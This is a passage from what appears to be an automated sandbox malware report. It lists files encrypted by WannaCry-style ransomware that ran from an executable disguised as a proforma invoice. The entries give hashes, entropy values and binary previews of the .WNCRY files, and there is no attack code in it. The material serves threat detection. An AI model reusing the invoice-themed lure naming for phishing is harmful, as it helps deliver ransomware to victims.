                                                          Preview:WANACRY!......4..<.A..u.J.>...a.ba....S...$h=..{....*.>2.M@.f.k....u.{[1..d..`xD*.:..y.....".t@..G..+D._]~.u...|...wY...OQN......U.Vu.^-h^...?.hP..<....m.....*..6NG.qB0g..\../...HO(../.<.|j..&.1.X...H.K*d....X....u?..s....L.x.......i......u...L!....Tj.............g......QQ..x.g........j..V.6..M.?......O5..5.O"C....Mi.!....,8...j...N.m...Yr.......u........o.z...#.<...........Xt....W5..g2.....:..o.q.(........7}.IQ.~x...S:.....Q....@..${..SC.y(....@/.....]..%.......w.=...A..o...3........2&...........xy..d.(...g.4.f..>_.m{L...N /...d"..\.8.`.....Q9..U6.By....UQ.=~-...C.>.b.jd.h;m#...PNhD\r..IYIg.@.Ku...Vc..H..M..ZAWE......b.[.......'..V.$...e.'.s+.[...>.v.S........](C.j..j......",j....b.+.]v.....Bq%Ea...0....}..e.X.y%Nb*D....{...>..k@...(..$.....Z|.o..vC.#.z#(.AS...K.P..'.z..f}.D.D...H1I."...~5...^..3r..."..U`..d>.?^..^.|.">.i....`..Ei.y..;V.K..;..oo.u.c..Mz.........{.Pm...0dF<.z+2K.n...u..h..A.+..i..'9.I....7.5.H2.7n.N.Tx...c.....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{A5457EB8-A2EC-4B00-8476-18B7C878AC51}mt11414620.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8840
                                                          Entropy (8bit):7.979257862353512
                                                          Encrypted:false
                                                          SSDEEP:192:Ox9jrPrsp8pp3Gq4euO9Ah9FB8D5AoeyiA3kLL7MTX5HFO2d:urP88b3ceuzldrLL7MTJHFO4
                                                          MD5:2D0A10256B207AB8FF9B093963AE7D2C
                                                          SHA1:FFE4FF820283ABB57664730465D61B125537122B
                                                          SHA-256:FDAA7494D775B61B1D5166D48600628151582C764E1B192E93C4501517C26C59
                                                          SHA-512:182F36BA7FC99048BBBFA6AF106C01E3A574C0C62E6FB86100EB01430EF2531B5DE22DEA9BC1453DD6BDB76703FE0CD459CA923E121AED9920E7098BF82AFEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L,S......+8.(....2..'.Q9;.|.7.SCBUYs..rab;T..k....(~*...T...X.....'...KG.......!Jt1.R..2oV.@W.J..+.%....zD.{..D.....\..g.tg0..R..d%.3...KI..;........o[Fe.]1..;.....}.t......:.......Wo.{....].B.w.....8p.E.fY-T..f.V....IM"...|*CW]Cg.....h..h<.4....i!......`...-....m...7o.......A...[Bvs.n.5U@.y\.|J.U..U4p.;.sa?.,.....n.....4.^...*hU...=t......b....L.A..,.4.)b...bPom.,.0.Y-...L......e#..*yv...z.Y....x|.[.x.S.tt/....97...6....r..?./.....z.WC.X.<..y.V....\...o...{...~...;..H.!...8"R"..o..4....j....`....+.......FT.0 ..]e....k.L...>.......?^S......HC=O=|,...m4..i..#..2......!.mh.n$.i....7j.$...,c$|.3|.(....TU*...t...aP(W..q.j.i...P.].Cb..-..Y.=...],Q./C.X...Yj...E8..._}.W-......R.y8.;.VG0..E0.....O.~.E.9.G:.HFe....^.A.K..........>.;..HX........o....*..X[rD.-...P...i..q.T....x2]i...oD....x..Yk.d..L..d..}..>...A.....W)....I.B0rV.;0.S9*.q.,.O..S...d%...c.'.....3h7v...!S}.xWR.K..!.h<K-M.UW.&#....+p...H...T4....|.@..).v.........:..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{A5457EB8-A2EC-4B00-8476-18B7C878AC51}mt11414620.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8840
                                                          Entropy (8bit):7.979257862353512
                                                          Encrypted:false
                                                          SSDEEP:192:Ox9jrPrsp8pp3Gq4euO9Ah9FB8D5AoeyiA3kLL7MTX5HFO2d:urP88b3ceuzldrLL7MTJHFO4
                                                          MD5:2D0A10256B207AB8FF9B093963AE7D2C
                                                          SHA1:FFE4FF820283ABB57664730465D61B125537122B
                                                          SHA-256:FDAA7494D775B61B1D5166D48600628151582C764E1B192E93C4501517C26C59
                                                          SHA-512:182F36BA7FC99048BBBFA6AF106C01E3A574C0C62E6FB86100EB01430EF2531B5DE22DEA9BC1453DD6BDB76703FE0CD459CA923E121AED9920E7098BF82AFEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L,S......+8.(....2..'.Q9;.|.7.SCBUYs..rab;T..k....(~*...T...X.....'...KG.......!Jt1.R..2oV.@W.J..+.%....zD.{..D.....\..g.tg0..R..d%.3...KI..;........o[Fe.]1..;.....}.t......:.......Wo.{....].B.w.....8p.E.fY-T..f.V....IM"...|*CW]Cg.....h..h<.4....i!......`...-....m...7o.......A...[Bvs.n.5U@.y\.|J.U..U4p.;.sa?.,.....n.....4.^...*hU...=t......b....L.A..,.4.)b...bPom.,.0.Y-...L......e#..*yv...z.Y....x|.[.x.S.tt/....97...6....r..?./.....z.WC.X.<..y.V....\...o...{...~...;..H.!...8"R"..o..4....j....`....+.......FT.0 ..]e....k.L...>.......?^S......HC=O=|,...m4..i..#..2......!.mh.n$.i....7j.$...,c$|.3|.(....TU*...t...aP(W..q.j.i...P.].Cb..-..Y.=...],Q./C.X...Yj...E8..._}.W-......R.y8.;.VG0..E0.....O.~.E.9.G:.HFe....^.A.K..........>.;..HX........o....*..X[rD.-...P...i..q.T....x2]i...oD....x..Yk.d..L..d..}..>...A.....W)....I.B0rV.;0.S9*.q.,.O..S...d%...c.'.....3h7v...!S}.xWR.K..!.h<K-M.UW.&#....+p...H...T4....|.@..).v.........:..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{C0938256-70FA-4461-B929-0017BA34D5B2}mt67739505.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9032
                                                          Entropy (8bit):7.980355682604797
                                                          Encrypted:false
                                                          SSDEEP:192:H1AKkhyS+1vZp4/296hkJFSka+Tx0NP+UqtNB+ewW4Dv4lkp2ruY:H+sS67dJFpKh67fw2R
                                                          MD5:24DCCB7A8DB185F27EAB67F7B0945EFA
                                                          SHA1:18A2933821A39F747C15E0B9586F5640EEF748A5
                                                          SHA-256:B535FE18F541FA5ECEBFB6321DBCFE86C257A44A72E68D1A110DC7F58351D105
                                                          SHA-512:B2E923A2FF011F0A130ED760CF2D63679D86E31E8B720AF1A99950E9EDF482997A871F48B7CE588420B88026BF28F59E5421DFD40EF288EC9AD40C8E841292F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....7......Z....o?.v.....P.I9{.M.'...T|\.a.._..t.qb.."..,*v.:..C-e.z.D....f.1..k...z.)..m...)mf.V.......$MdA.._y..........Y_.G?P.?....i......_...R..#.b.C5..b..@........C.].].>h......l.R....w?.74...1U..=.E..|..YB...4..!.4h...H04.Ri..G.O[<t...bA..J,....*".........'..c..'......a0...S....7..&"2.......L#....-c...2.>u.G.}..{.:..y.n.(#.../1......+.)x{.)..<.x.1.X.'.":.n.......,.ke...n..%...T=u.W......l.....z..h.....o."Z..T.>.U....J.B.P.!....)..P....v@)<.^9...R.K....)...<...3...a...$F.W{t*....f..+...H.2....G.......rlvo..E%..gN...xT.2R.;p..K=......~W.!...Nt..D!.-N......,t.U..........tT.DBH....(.)+{.!.$.m........9Y..t}....b.b#.q...H..<:.n..e..?y.)......w.%....)..`S.._..L..E.4A...uq.....cp=|.I~X.&.f.wy...dD~~.\..It..<.4.fkL...y.4=.B.%.......n..Z..k-...6.0.._=r"5H5..f. 7._..n ..=......|>.c*UQ..M..n........k..l..V...+.?xx..}.J...Hz...........Qt....v!*g.7.~"w.....W.........N.'........a...k...$...X`..;v.i.Y..R.2rmkk.......!..f.5.=....,=....6}.t..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{C0938256-70FA-4461-B929-0017BA34D5B2}mt67739505.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9032
                                                          Entropy (8bit):7.980355682604797
                                                          Encrypted:false
                                                          SSDEEP:192:H1AKkhyS+1vZp4/296hkJFSka+Tx0NP+UqtNB+ewW4Dv4lkp2ruY:H+sS67dJFpKh67fw2R
                                                          MD5:24DCCB7A8DB185F27EAB67F7B0945EFA
                                                          SHA1:18A2933821A39F747C15E0B9586F5640EEF748A5
                                                          SHA-256:B535FE18F541FA5ECEBFB6321DBCFE86C257A44A72E68D1A110DC7F58351D105
                                                          SHA-512:B2E923A2FF011F0A130ED760CF2D63679D86E31E8B720AF1A99950E9EDF482997A871F48B7CE588420B88026BF28F59E5421DFD40EF288EC9AD40C8E841292F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....7......Z....o?.v.....P.I9{.M.'...T|\.a.._..t.qb.."..,*v.:..C-e.z.D....f.1..k...z.)..m...)mf.V.......$MdA.._y..........Y_.G?P.?....i......_...R..#.b.C5..b..@........C.].].>h......l.R....w?.74...1U..=.E..|..YB...4..!.4h...H04.Ri..G.O[<t...bA..J,....*".........'..c..'......a0...S....7..&"2.......L#....-c...2.>u.G.}..{.:..y.n.(#.../1......+.)x{.)..<.x.1.X.'.":.n.......,.ke...n..%...T=u.W......l.....z..h.....o."Z..T.>.U....J.B.P.!....)..P....v@)<.^9...R.K....)...<...3...a...$F.W{t*....f..+...H.2....G.......rlvo..E%..gN...xT.2R.;p..K=......~W.!...Nt..D!.-N......,t.U..........tT.DBH....(.)+{.!.$.m........9Y..t}....b.b#.q...H..<:.n..e..?y.)......w.%....)..`S.._..L..E.4A...uq.....cp=|.I~X.&.f.wy...dD~~.\..It..<.4.fkL...y.4=.B.%.......n..Z..k-...6.0.._=r"5H5..f. 7._..n ..=......|>.c*UQ..M..n........k..l..V...+.?xx..}.J...Hz...........Qt....v!*g.7.~"w.....W.........N.'........a...k...$...X`..;v.i.Y..R.2rmkk.......!..f.5.=....,=....6}.t..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{F34ABF88-5BB8-4FAA-874D-A832315461CD}mt16400656.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7032
                                                          Entropy (8bit):7.972143038462305
                                                          Encrypted:false
                                                          SSDEEP:192:9WKgjVppSEkJbVhU3BQerAAVIc8TQ1AXWrOD/O:9SRp8hJ5h0MyCmaDG
                                                          MD5:E0F09906CF2A0F164B22A99C3F20F144
                                                          SHA1:ABE8BAFBCBA0D7B32ACA23FF470BBE47E7432113
                                                          SHA-256:F16AFB634198869D11E36DA9BE296C4DC2C6AAABEB9C2751BE97F2000AA4EE60
                                                          SHA-512:1BE318145B5440E8777F5D62E84AA58858B6E82935DD667C26F95445B055945B296D006E2F28DDE24BB971EF126F603085D87E7478FFFFB10D04AC1DD1C9E3F1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=2.m<P...D.>QaP...=X. O..zA(YSh ....|K.#.(.1.4t..3.Td.O......x;....s._..._hT.Bh.....h.L..&...\C... ...5`.=C.G..}.sS.\......p?2..%u...C...i3."A......N]{r.....a.`.'.).&.p.......r..QA?...L.8..8..Lh..}$.R.6X....zhtu.6}..:`]..E.:s...I..[....k..wU'Zf..^U....T........ ......!-...-.g..Vy......J.&.^...<..,..x......#..../Y]...~.8x...=...S....e....=.))..@.:.Ag..|........p.1..:ra.^+...Dk.H...5,[s...^.$.{Q..O...b.....u.Q...2.{Q...3b.G..-v~4..N...FS.4.....mW....2.......s.S..vJ8...d.o.>..Ms.*P.OZ}...$.}.q...~e..0.v,.5...l.>~.p%....?E.A...7=3....F.1%.l6..X}k6.{./...daFA.s#s!.MT........g.`)iZ..;L...Q..4..a..+i..M.g.g..6.....k..OO....;=:p.!.\P...>d.CUH(.'...".ZU"./...C>Y@[y=;I..&.$.s..0..J.Q. ...ju.....Q....o..^...GB.q...p..... y...{.....2.O!.L....8.t......K..d.t.*....*m_g......\..[...........hu..wy(X..(.E}....i.E..%...J...x.....]}8ZRbE.1..%.z-L93.-d.<c..c}....?..,v..6....n,"..Q..f$.SeLj.r...RW...u....|.z.-0.`.GZ...i>...(.....?.,...$.-.!...J..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{F34ABF88-5BB8-4FAA-874D-A832315461CD}mt16400656.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7032
                                                          Entropy (8bit):7.972143038462305
                                                          Encrypted:false
                                                          SSDEEP:192:9WKgjVppSEkJbVhU3BQerAAVIc8TQ1AXWrOD/O:9SRp8hJ5h0MyCmaDG
                                                          MD5:E0F09906CF2A0F164B22A99C3F20F144
                                                          SHA1:ABE8BAFBCBA0D7B32ACA23FF470BBE47E7432113
                                                          SHA-256:F16AFB634198869D11E36DA9BE296C4DC2C6AAABEB9C2751BE97F2000AA4EE60
                                                          SHA-512:1BE318145B5440E8777F5D62E84AA58858B6E82935DD667C26F95445B055945B296D006E2F28DDE24BB971EF126F603085D87E7478FFFFB10D04AC1DD1C9E3F1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=2.m<P...D.>QaP...=X. O..zA(YSh ....|K.#.(.1.4t..3.Td.O......x;....s._..._hT.Bh.....h.L..&...\C... ...5`.=C.G..}.sS.\......p?2..%u...C...i3."A......N]{r.....a.`.'.).&.p.......r..QA?...L.8..8..Lh..}$.R.6X....zhtu.6}..:`]..E.:s...I..[....k..wU'Zf..^U....T........ ......!-...-.g..Vy......J.&.^...<..,..x......#..../Y]...~.8x...=...S....e....=.))..@.:.Ag..|........p.1..:ra.^+...Dk.H...5,[s...^.$.{Q..O...b.....u.Q...2.{Q...3b.G..-v~4..N...FS.4.....mW....2.......s.S..vJ8...d.o.>..Ms.*P.OZ}...$.}.q...~e..0.v,.5...l.>~.p%....?E.A...7=3....F.1%.l6..X}k6.{./...daFA.s#s!.MT........g.`)iZ..;L...Q..4..a..+i..M.g.g..6.....k..OO....;=:p.!.\P...>d.CUH(.'...".ZU"./...C>Y@[y=;I..&.$.s..0..J.Q. ...ju.....Q....o..^...GB.q...p..... y...{.....2.O!.L....8.t......K..d.t.*....*m_g......\..[...........hu..wy(X..(.E}....i.E..%...J...x.....]}8ZRbE.1..%.z-L93.-d.<c..c}....?..,v..6....n,"..Q..f$.SeLj.r...RW...u....|.z.-0.`.GZ...i>...(.....?.,...$.-.!...J..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048
                                                          Entropy (8bit):7.799500606706895
                                                          Encrypted:false
                                                          SSDEEP:24:bkxiG/0TRNC0onGGfPVstLiVe9bqWbSU61rWVrDZ8falnshFjvQ:bkxbuonGGeLiKJ3w61Vualnqu
                                                          MD5:6AFDC70EF791E2079EDCB503E334727D
                                                          SHA1:CA902BD9C8885D1D2EF20D518E2991D5A068B0B0
                                                          SHA-256:C0C6430559EA1F758FC869A224E96068AF875E7C7FDACE273CC0A1595AD06675
                                                          SHA-512:4544C0D66B414C6E554F6688123D9CC1052930E5F7F5FA16BEF0B75653504160F8AB8202A9767BE7A6781CBDC8A4B165CD420CE5D0F00679D4B35FB2A1CFECE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....}..D-....(F..K..A..5....u.y....Zj...+....l..Q.l+.m.uE.......#...n~...`.].9V.1......b...D..;.....M..j1.1>.F....3.~.D........,.VD.}...z&....o...|..tN.........H...^..)......6...k{....~......#|..hy..Y...9..$.-.....1.2m3=Ri'..x...q.h..[.S..;..+..............$.S|.....).~.ot>.....6.k...N..1e@..}...........R$..s0.ejP.(..... .J....b...@g...J".....@.E=.)J..|.O...'.12..`......t^.5..q.;...,.,M.Vrz..C...$0.X./..M.......W....E.2.4.n...r.4....hY.k.b...07.|.$.u....h....0..lmb.J`..._._.,..j9.Y.....y.RJ.....G.$iY.'+KI.D....1....7......W.....7&@^n..pv{....v.~I/k..........*...2t.P.3.........S#?r..I.....}V..M..MQ..\.{.\....WzL.0.%E-..h._j....*.....Q.P=../...R.M{.......!..g.x.i..i.[.:+.9^.. ..`...4...2]-C.:.......|Z......Hw..h.dn...ch.0.K.....?..".v...JjsU..}....S.?.r.7"...].).{.v>.Lm(..}.c..l!.......9.1........F.L....../...P....;J.@.MQ."]...u...w.Z...?..>..]...3>.....b....+t5x;..x.fdT\.P.?..Yb.|.S..............+.....K..".#.5w..P.@.$.o@bT..KT.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048
                                                          Entropy (8bit):7.799500606706895
                                                          Encrypted:false
                                                          SSDEEP:24:bkxiG/0TRNC0onGGfPVstLiVe9bqWbSU61rWVrDZ8falnshFjvQ:bkxbuonGGeLiKJ3w61Vualnqu
                                                          MD5:6AFDC70EF791E2079EDCB503E334727D
                                                          SHA1:CA902BD9C8885D1D2EF20D518E2991D5A068B0B0
                                                          SHA-256:C0C6430559EA1F758FC869A224E96068AF875E7C7FDACE273CC0A1595AD06675
                                                          SHA-512:4544C0D66B414C6E554F6688123D9CC1052930E5F7F5FA16BEF0B75653504160F8AB8202A9767BE7A6781CBDC8A4B165CD420CE5D0F00679D4B35FB2A1CFECE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....}..D-....(F..K..A..5....u.y....Zj...+....l..Q.l+.m.uE.......#...n~...`.].9V.1......b...D..;.....M..j1.1>.F....3.~.D........,.VD.}...z&....o...|..tN.........H...^..)......6...k{....~......#|..hy..Y...9..$.-.....1.2m3=Ri'..x...q.h..[.S..;..+..............$.S|.....).~.ot>.....6.k...N..1e@..}...........R$..s0.ejP.(..... .J....b...@g...J".....@.E=.)J..|.O...'.12..`......t^.5..q.;...,.,M.Vrz..C...$0.X./..M.......W....E.2.4.n...r.4....hY.k.b...07.|.$.u....h....0..lmb.J`..._._.,..j9.Y.....y.RJ.....G.$iY.'+KI.D....1....7......W.....7&@^n..pv{....v.~I/k..........*...2t.P.3.........S#?r..I.....}V..M..MQ..\.{.\....WzL.0.%E-..h._j....*.....Q.P=../...R.M{.......!..g.x.i..i.[.:+.9^.. ..`...4...2]-C.:.......|Z......Hw..h.dn...ch.0.K.....?..".v...JjsU..}....S.?.r.7"...].).{.v>.Lm(..}.c..l!.......9.1........F.L....../...P....;J.@.MQ."]...u...w.Z...?..>..]...3>.....b....+t5x;..x.fdT\.P.?..Yb.|.S..............+.....K..".#.5w..P.@.$.o@bT..KT.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991310359690565
                                                          Encrypted:true
                                                          SSDEEP:768:ZWESV8Ak8NGEYAjXZVCssHQSmZ4N3EZ9WG4DSOLRT:ZQyqGaTq3/G43LRT
                                                          MD5:AD0ABB155F19A18A3B44292925AA36DB
                                                          SHA1:706FEBF8D2DD9B8EB8D697DAEE59627EBE84B822
                                                          SHA-256:1861A8D8492668F24C914843AD82D34C711944965C3E81826297BFA9623BB8BF
                                                          SHA-512:AAEE1B18988B6B6A8C2166C31A3A06DFE4CD1DE566C57F0A0F9F37CC06CF025ECB38FE4FFE7A4F4413FF8D0220175E826085CB0425626FB9DE51CAC65EC384C4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........&M.&...*.].....?...U...d.........i'.........K?Z.......L9.i....J..k.L......j:].FlC..9#9{.A.R....*..e....:..IdA....=..}..]....W.")t.&..C[.....!_..SK.h.Q|....I..x.[.....t...h.......$.{..4gk^..5.p;3.67..i.:...../eV...(..:..aa`..?..S.ZT2......`.......6.b.d.+.'U .b.U.Zi..."".^.......B....!.mJ.x23,..i..9...Y[...>.64.]:V.......?.+..V..H...)a......O...@+/....T...5."....b&T.LJ...-.p..[.\..V?.,..L\.D.4..Q....@....X.we...wh..L.V..CF:.;)h...R....i..I@......,..J..|Vg....1.|..J'L....5].f.K.........J(.w..I~Z.....2&C..,..........qK.7wd.....{..<..w._wM....he2..i7S.-......i.\?64.I..._..P.!T.3R..J.). .4.8vZ4<&....~W...]s....2..@..O..n.n.~....gU......h.d..:...g..e......5.r.....1 cX=<.4.P..WEdw..N....5(....2..z$..O.g.......".<...V^.q.J.PB..g.".._.&i7M.OJ..B(...)G};.c...........yk.vtKl.C..<rDh\;k....DJ..........;.9[..gK.7hj....I|9.k:o|...(G.Zh.J.....~..`j.7.,...c'.@3...4..Tj...:n.C...2..MO.?q.<o?.#..wA.z...G.x..s..E&..|I&0..-..{v...*2

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991310359690565
                                                          Encrypted:true
                                                          SSDEEP:768:ZWESV8Ak8NGEYAjXZVCssHQSmZ4N3EZ9WG4DSOLRT:ZQyqGaTq3/G43LRT
                                                          MD5:AD0ABB155F19A18A3B44292925AA36DB
                                                          SHA1:706FEBF8D2DD9B8EB8D697DAEE59627EBE84B822
                                                          SHA-256:1861A8D8492668F24C914843AD82D34C711944965C3E81826297BFA9623BB8BF
                                                          SHA-512:AAEE1B18988B6B6A8C2166C31A3A06DFE4CD1DE566C57F0A0F9F37CC06CF025ECB38FE4FFE7A4F4413FF8D0220175E826085CB0425626FB9DE51CAC65EC384C4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........&M.&...*.].....?...U...d.........i'.........K?Z.......L9.i....J..k.L......j:].FlC..9#9{.A.R....*..e....:..IdA....=..}..]....W.")t.&..C[.....!_..SK.h.Q|....I..x.[.....t...h.......$.{..4gk^..5.p;3.67..i.:...../eV...(..:..aa`..?..S.ZT2......`.......6.b.d.+.'U .b.U.Zi..."".^.......B....!.mJ.x23,..i..9...Y[...>.64.]:V.......?.+..V..H...)a......O...@+/....T...5."....b&T.LJ...-.p..[.\..V?.,..L\.D.4..Q....@....X.we...wh..L.V..CF:.;)h...R....i..I@......,..J..|Vg....1.|..J'L....5].f.K.........J(.w..I~Z.....2&C..,..........qK.7wd.....{..<..w._wM....he2..i7S.-......i.\?64.I..._..P.!T.3R..J.). .4.8vZ4<&....~W...]s....2..@..O..n.n.~....gU......h.d..:...g..e......5.r.....1 cX=<.4.P..WEdw..N....5(....2..z$..O.g.......".<...V^.q.J.PB..g.".._.&i7M.OJ..B(...)G};.c...........yk.vtKl.C..<rDh\;k....DJ..........;.9[..gK.7hj....I|9.k:o|...(G.Zh.J.....~..`j.7.,...c'.@3...4..Tj...:n.C...2..MO.?q.<o?.#..wA.z...G.x..s..E&..|I&0..-..{v...*2

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991931964004868
                                                          Encrypted:true
                                                          SSDEEP:768:Wn9l36jGn7ViPeT5Gj6PsPCB1cfS44uPph4c:Alqjo7VtT5I6F1cfSnuPrj
                                                          MD5:B3C4DFD40C04CF2BCF2BC245D6E442D7
                                                          SHA1:3A511F9B5BC461BF63D29E031CA370CEC71FBB14
                                                          SHA-256:3ACC5B328CB7D336C0E23235AB97D20A38840D9E304EC093702734A886A9570C
                                                          SHA-512:EC0E321DD98352C28F07C3F25CF3A5DCC4E2CC229636DF2894BA485E52A96B1C10B51FD51E15B6B4DA93CC4E3A9B86F8969318FFF0F706723407481608825F07
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....~.}.2r....F.Da.}..M2jh.6.J...s-`^m(....9.9...V%..-..u<8.X...*g...BuH..4.7M....V3.0...{.J..I.v.........G&eg....m.OW..4(...?.;.!....).%.?.f[{..A..6sB.?........*[.H.u....U...5......z.H..9H'9...z....R.!y...F...0!.R..<Q.{.......z.cS. ....D..Q..D6X..E.....`........X&(....K.9...c.s.M'(W.o........H..@.Ml.a'.....+e...a.!'6...(.....;.7.CE.i.N@..........rk...c...(L>ws.~d..b.$.E..\.tb.Dsc...e".........F.f.v..d..(.e .:... ...D.[..xA..S..{=x._W..W...&......."+......N..\=......_..X<......Z..N.x..E..x>.%W....|{....N\g_.[.].....f.).W.*......b..t.:.t.f2..pv ...1...2;.Z..H.6.....:.,.....&.Dm+..,.V.k :.a.!..m..v...n..kF:....]..........6.......f..QF..MpD...m.IWK.....!........k...j4_.[....~..6..V.C@p.y`...|c..-s.z.#...59...1..h{...a.R.G.B.gG`.....(....X..Kg}5....o\EtG....8"o`.tL..>M.WH3u.u...vc.a..Jfq.....|.u,...x..._)E77-M.h;.R.0.J.......3..L.p.....l,_....e.1... ........Ks.Qa%.=*#.m .8+...s..A[.g...O.... *......z.?..q...........:@.Yp..U..qN...o...Pf

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991931964004868
                                                          Encrypted:true
                                                          SSDEEP:768:Wn9l36jGn7ViPeT5Gj6PsPCB1cfS44uPph4c:Alqjo7VtT5I6F1cfSnuPrj
                                                          MD5:B3C4DFD40C04CF2BCF2BC245D6E442D7
                                                          SHA1:3A511F9B5BC461BF63D29E031CA370CEC71FBB14
                                                          SHA-256:3ACC5B328CB7D336C0E23235AB97D20A38840D9E304EC093702734A886A9570C
                                                          SHA-512:EC0E321DD98352C28F07C3F25CF3A5DCC4E2CC229636DF2894BA485E52A96B1C10B51FD51E15B6B4DA93CC4E3A9B86F8969318FFF0F706723407481608825F07
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....~.}.2r....F.Da.}..M2jh.6.J...s-`^m(....9.9...V%..-..u<8.X...*g...BuH..4.7M....V3.0...{.J..I.v.........G&eg....m.OW..4(...?.;.!....).%.?.f[{..A..6sB.?........*[.H.u....U...5......z.H..9H'9...z....R.!y...F...0!.R..<Q.{.......z.cS. ....D..Q..D6X..E.....`........X&(....K.9...c.s.M'(W.o........H..@.Ml.a'.....+e...a.!'6...(.....;.7.CE.i.N@..........rk...c...(L>ws.~d..b.$.E..\.tb.Dsc...e".........F.f.v..d..(.e .:... ...D.[..xA..S..{=x._W..W...&......."+......N..\=......_..X<......Z..N.x..E..x>.%W....|{....N\g_.[.].....f.).W.*......b..t.:.t.f2..pv ...1...2;.Z..H.6.....:.,.....&.Dm+..,.V.k :.a.!..m..v...n..kF:....]..........6.......f..QF..MpD...m.IWK.....!........k...j4_.[....~..6..V.C@p.y`...|c..-s.z.#...59...1..h{...a.R.G.B.gG`.....(....X..Kg}5....o\EtG....8"o`.tL..>M.WH3u.u...vc.a..Jfq.....|.u,...x..._)E77-M.h;.R.0.J.......3..L.p.....l,_....e.1... ........Ks.Qa%.=*#.m .8+...s..A[.g...O.... *......z.?..q...........:@.Yp..U..qN...o...Pf

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.993406946076543
                                                          Encrypted:true
                                                          SSDEEP:384:8Oh++k11Fp2JW/HcXcl2DRwnEbWKu8nl4zFyBnP4AQbDsghd1zf0VFo:8Oh++0H/HUCqEWWKu8n6BOWl3OFo
                                                          MD5:00FB43386353A61A18F150E14BE4D4DF
                                                          SHA1:0D8F7F8C453081586909DD0F608518DB5B9930BB
                                                          SHA-256:B2801214AD45FDDF0552A6DFE1B5EB6006C3A09CD061B0E7EB510CE7F7976ACD
